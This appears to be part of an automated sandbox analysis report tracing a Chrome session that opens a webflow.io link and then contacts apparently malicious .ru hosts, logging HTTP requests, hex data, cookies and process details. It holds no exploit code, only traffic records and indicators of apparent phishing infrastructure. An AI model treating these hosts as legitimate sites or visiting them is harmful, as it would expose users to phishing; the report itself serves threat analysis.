                                                  Data Ascii: pO++oO++oOOFpOOFpOOFpO++oOOFpO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpOOFpO++oOOFpOOFpOOFpO++oOOFpO++oO++oO++oOOFpOOFpO++oOOFpO++oO++oOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpOOFpO++oOOFpOOFpO++oOOFpOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oO+
                                                  2025-03-28 12:43:06 UTC1369INData Raw: 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 2b 2b 6f 4f 2b 2b 6f 4f 4f 46 70 4f 4f 46 70 4f 2b 2b 6f 4f 4f 46
                                                  Data Ascii: OOFpO++oOOFpO++oOOFpO++oOOFpO++oO++oOOFpO++oO++oOOFpOOFpO++oO++oOOFpOOFpO++oO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oO++oOOFpOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpO++oOOFpO++oOOFpO++oO++oO++oOOFpO++oO++oO++oOOFpOOFpOOFpO++oO++oOOFpO++oO++oOOFpOOFpO++oOOF


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  11192.168.2.449752104.21.73.2124435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:07 UTC1327OUTGET /favicon.ico HTTP/1.1
                                                  Host: fgof.koxicarev.ru
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://fgof.koxicarev.ru/zXMKsj/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImhCLzAwMU1aWVgxU3VNTmFCaExpdGc9PSIsInZhbHVlIjoiWEV1UVB5REEzdEhSSXVOK0dzS3F3UHZITkdLNXg4YmtFZVMvVHNoTXZVb04reFJBck4velpFYVNGSlQ2V3lINXlHNU5hSG55cDRwYWs3cTQ4cDlvMkFHNFhuM3NVWlJWYktST2xXMzJMZUV2RFg3MEUwVFpRNzRQMjdQSmwrbDEiLCJtYWMiOiI3OTdjZWM2NTQ1YjhkNDFkOTczYjZkZjIzMGNjZjI0N2E2NzExMjA1OTU2NDQ3ZTkyYjM4NzYxYjQ3NWFiNmEyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImFSc2k0WWtLU1kwRHppRHlWNFIydmc9PSIsInZhbHVlIjoiNmhoQVA5T1FhVzVjYTZMTnhQMHZjWHE0OGhKVVJYWXlVZW1IOXdvK2dBQ1ZZWlF2Q2RES1RubkR1TURFT2NrRWNhQW1zL3J4d3BGQVQ1OG84YnFtdXpXcDRFU2FNY3drUHNzOHc5MlIzaElNcmowZzY1OEQ4VWlONmoyMUtyL2MiLCJtYWMiOiI1ODgzYjFjNGRhMjVjMzMzNzBiOTNmYzg2MDgwMzRjYjM2Y2Y4MjdjMGIwN2IzMzdhODNhMWI3MGY3Y2NkYmE4IiwidGFnIjoiIn0%3D
                                                  2025-03-28 12:43:07 UTC1082INHTTP/1.1 404 Not Found
                                                  Date: Fri, 28 Mar 2025 12:43:07 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=14400
                                                  cf-cache-status: HIT
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Vary: Accept-Encoding
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=24410&min_rtt=10068&rtt_var=17927&sent=107&recv=49&lost=0&retrans=1&sent_bytes=113511&recv_bytes=6638&delivery_rate=1882865&cwnd=111&unsent_bytes=0&cid=7c5043c8bef34e9a&ts=458424&x=0"
                                                  Age: 8640
                                                  Server: cloudflare
                                                  CF-RAY: 9277361d5f9a88c3-EWR
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=89802&min_rtt=89744&rtt_var=19020&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1899&delivery_rate=33991&cwnd=252&unsent_bytes=0&cid=33733f076881f93d&ts=1312&x=0"
                                                  2025-03-28 12:43:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  12192.168.2.44975535.190.80.14435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:08 UTC542OUTOPTIONS /report/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D HTTP/1.1
                                                  Host: a.nel.cloudflare.com
                                                  Connection: keep-alive
                                                  Origin: https://fgof.koxicarev.ru
                                                  Access-Control-Request-Method: POST
                                                  Access-Control-Request-Headers: content-type
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:08 UTC336INHTTP/1.1 200 OK
                                                  Content-Length: 0
                                                  access-control-max-age: 86400
                                                  access-control-allow-methods: POST, OPTIONS
                                                  access-control-allow-origin: *
                                                  access-control-allow-headers: content-type, content-length
                                                  date: Fri, 28 Mar 2025 12:43:07 GMT
                                                  Via: 1.1 google
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  13192.168.2.44975635.190.80.14435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:08 UTC517OUTPOST /report/v4?s=twTw6EGda%2FXPRdY1GyP9qd4lGK6UIWMPRHFAlUKwYFAjuQ%2FR3LfmBwXaYpfCVoUZ3kXUc%2FWoMbC73zxtlqrU5gICSDUlM9eIUvLgqPhuD0E1dkl5ey8TMKftd1Wx0A%3D%3D HTTP/1.1
                                                  Host: a.nel.cloudflare.com
                                                  Connection: keep-alive
                                                  Content-Length: 431
                                                  Content-Type: application/reports+json
                                                  Origin: https://fgof.koxicarev.ru
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:08 UTC431OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 66 67 6f 66 2e 6b 6f 78 69 63 61 72 65 76 2e 72 75 2f 7a 58 4d 4b 73 6a 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 37 33 2e 32 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                  Data Ascii: [{"age":1,"body":{"elapsed_time":103,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://fgof.koxicarev.ru/zXMKsj/","sampling_fraction":1.0,"server_ip":"104.21.73.212","status_code":404,"type":"http.error"},"type":"network-error
                                                  2025-03-28 12:43:08 UTC214INHTTP/1.1 200 OK
                                                  Content-Length: 0
                                                  access-control-allow-origin: *
                                                  vary: Origin
                                                  date: Fri, 28 Mar 2025 12:43:08 GMT
                                                  Via: 1.1 google
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  14192.168.2.449759104.21.95.2064435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:20 UTC569OUTGET /bhanchod@ac8zycz HTTP/1.1
                                                  Host: i8yr.viugbu.ru
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: */*
                                                  Origin: https://fgof.koxicarev.ru
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://fgof.koxicarev.ru/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:21 UTC281INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:43:21 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Server: cloudflare
                                                  Access-Control-Allow-Origin: *
                                                  Cf-Cache-Status: DYNAMIC
                                                  CF-RAY: 9277366e89f743ec-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2025-03-28 12:43:21 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                  Data Ascii: 11
                                                  2025-03-28 12:43:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  15192.168.2.449760172.67.148.1004435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:21 UTC394OUTGET /bhanchod@ac8zycz HTTP/1.1
                                                  Host: i8yr.viugbu.ru
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Sec-Fetch-Storage-Access: active
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:22 UTC825INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:43:22 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=STQ2qoYsKZQruSmr%2BbiZzvfNs7ZIRJXnUENNOKRLBIjrmA4rPD%2Fso5IChFJK7tCDv6YibmqUG8%2BczTtQpWId8P1qCk4igXOhXbFLHuCZb2vg9XuIIDt2r%2BxOiyHM7ImGtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 927736751acf1a1b-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=90474&min_rtt=90144&rtt_var=19311&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2818&recv_bytes=966&delivery_rate=33866&cwnd=250&unsent_bytes=0&cid=0761aa0992411069&ts=799&x=0"
                                                  2025-03-28 12:43:22 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                  Data Ascii: 11
                                                  2025-03-28 12:43:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  16192.168.2.449761104.21.95.2064435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:28 UTC569OUTGET /bhanchod@ac8zycz HTTP/1.1
                                                  Host: i8yr.viugbu.ru
                                                  Connection: keep-alive
                                                  sec-ch-ua-platform: "Windows"
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                  sec-ch-ua-mobile: ?0
                                                  Accept: */*
                                                  Origin: https://fgof.koxicarev.ru
                                                  Sec-Fetch-Site: cross-site
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://fgof.koxicarev.ru/
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:29 UTC826INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:43:29 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PS%2BIEH8x9eyZUSHFMC9kKNd49RmNrJqNKqxcy4Fwuq53fORQS9pK%2BPnfOO4WRv67JL%2FxDUEvdP7W98kWEAaYipSh%2BWAjjWgvWXOhAubQCDjAKRy7v9HMiIroq0pt6uA14Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 927736a2db58a8d0-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=89244&min_rtt=89212&rtt_var=18844&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1141&delivery_rate=34260&cwnd=252&unsent_bytes=0&cid=b9321056562caa10&ts=738&x=0"
                                                  2025-03-28 12:43:29 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                  Data Ascii: 11
                                                  2025-03-28 12:43:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.449762172.67.148.1004435356C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2025-03-28 12:43:29 UTC394OUTGET /bhanchod@ac8zycz HTTP/1.1
                                                  Host: i8yr.viugbu.ru
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Sec-Fetch-Storage-Access: active
                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                  Accept-Language: en-US,en;q=0.9
                                                  2025-03-28 12:43:30 UTC827INHTTP/1.1 200 OK
                                                  Date: Fri, 28 Mar 2025 12:43:30 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Access-Control-Allow-Origin: *
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BQLnyffed3z1n78vli8m15iHNbCN4s%2BVxbO5Dyl1AewER4c7OC2wmXSuyABJmrLly%2FJDjo3PvXIIze59k474MV%2BJMOd2kyUBnOESeaiwEYh8yz1zJF7yjg41r4B%2Fe7F3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 927736a8ac58431a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=89554&min_rtt=89115&rtt_var=19242&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2819&recv_bytes=966&delivery_rate=34292&cwnd=252&unsent_bytes=0&cid=b3085abb14860091&ts=770&x=0"
                                                  2025-03-28 12:43:30 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                  Data Ascii: 11
                                                  2025-03-28 12:43:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  020406080s020406080100

                                                  Click to jump to process

                                                  020406080s0.0050100MB

                                                  Click to jump to process

                                                  Target ID:1
                                                  Start time:08:42:30
                                                  Start date:28/03/2025
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                  Imagebase:0x7ff786830000
                                                  File size:3'388'000 bytes
                                                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:2
                                                  Start time:08:42:33
                                                  Start date:28/03/2025
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2576,i,238525167681460180,11121848182826903600,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2632 /prefetch:3
                                                  Imagebase:0x7ff7e4870000
                                                  File size:3'388'000 bytes
                                                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:false

                                                  Target ID:4
                                                  Start time:08:42:39
                                                  Start date:28/03/2025
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://littlestownseniorhighschool.webflow.io/"
                                                  Imagebase:0x7ff786830000
                                                  File size:3'388'000 bytes
                                                  MD5 hash:E81F54E6C1129887AEA47E7D092680BF
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                  No disassembly